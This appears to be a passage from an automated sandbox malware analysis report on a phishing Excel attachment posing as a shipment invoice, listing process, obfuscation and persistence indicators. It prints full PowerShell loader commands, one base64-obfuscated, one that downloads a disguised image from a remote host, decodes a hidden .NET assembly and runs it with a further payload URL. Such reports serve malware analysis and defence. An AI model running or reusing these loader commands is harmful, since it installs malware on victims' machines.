                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: C9730000.0.drInitial sample: OLE indicators vbamacros = False
                Source: August Shipment - Inv No. 041.xlsInitial sample: OLE indicators encrypted = True

                Data Obfuscation

                barindex
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_002C2D3C push edx; iretd 9_2_002C2D3D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00265924 push 34023C60h; iretd 13_2_0026592D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00262DA2 pushfd ; ret 13_2_00262DB1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00262D8D pushad ; ret 13_2_00262DA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00457186 push ecx; ret 14_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0045E55D push esi; ret 14_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00457AA8 push eax; ret 14_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434EB6 push ecx; ret 14_2_00434EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002806 push ecx; ret 14_2_10002819
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4

                Persistence and Installation Behavior

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\a38.fr@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\a38.fr@SSL\DavWWWRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].doc.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 4F3AD743.doc.4.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406EEB ShellExecuteW,URLDownloadToFileW,14_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
